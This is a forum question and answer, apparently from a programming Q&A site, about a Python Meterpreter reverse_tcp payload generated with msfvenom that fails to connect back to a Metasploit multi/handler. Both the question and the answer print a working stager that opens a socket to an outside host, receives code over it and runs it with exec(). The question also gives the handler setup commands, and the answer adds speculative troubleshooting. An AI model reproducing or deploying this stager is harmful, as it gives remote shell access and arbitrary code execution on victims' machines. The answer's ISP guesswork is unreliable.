# Meterpreter not connecting back - Python

Tags: python, exploit, payload, metasploit

I have used `msfvenom` to create the following python payload:

```
import socket,struct
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('MY PUBLIC IP',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
exec(d,{'s':s})
```

I have then opened up `msfconsole`, and done the following:

```
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.0.186 (MY LOCAL IP)
set LPORT 3930
exploit
```

It begins the reverse TCP handler on 192.168.0.186:3930, and also starts the payload handler. However, when I run the script on another computer, the payload times out after waiting for about a minute, and msfconsole doesn't register anything. I have port forwarded 3930 on the router. What am I doing wrong here?

Answer (score 0):

This is the code I would use for a reverse TCP on Unix systems, with the details you've provided. However, I stumbled upon your post after error searching, so this isn't 100% flawless. I've gotten it to work perfectly in the past, but just recently it's begun to lag. It'll run once on an internal system, but anything after that gives me the same error message you got. I also get the same message when doing this over the WAN, as opposed to LAN, however it doesn't run the first time around. What ISP do you have? It may be entirely dependent on that.

```
import socket,struct
s=socket.socket(2,1)
s.connect(('IP ADDRESS',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
    d+=s.recv(4096)
exec(d,{'s':s})
```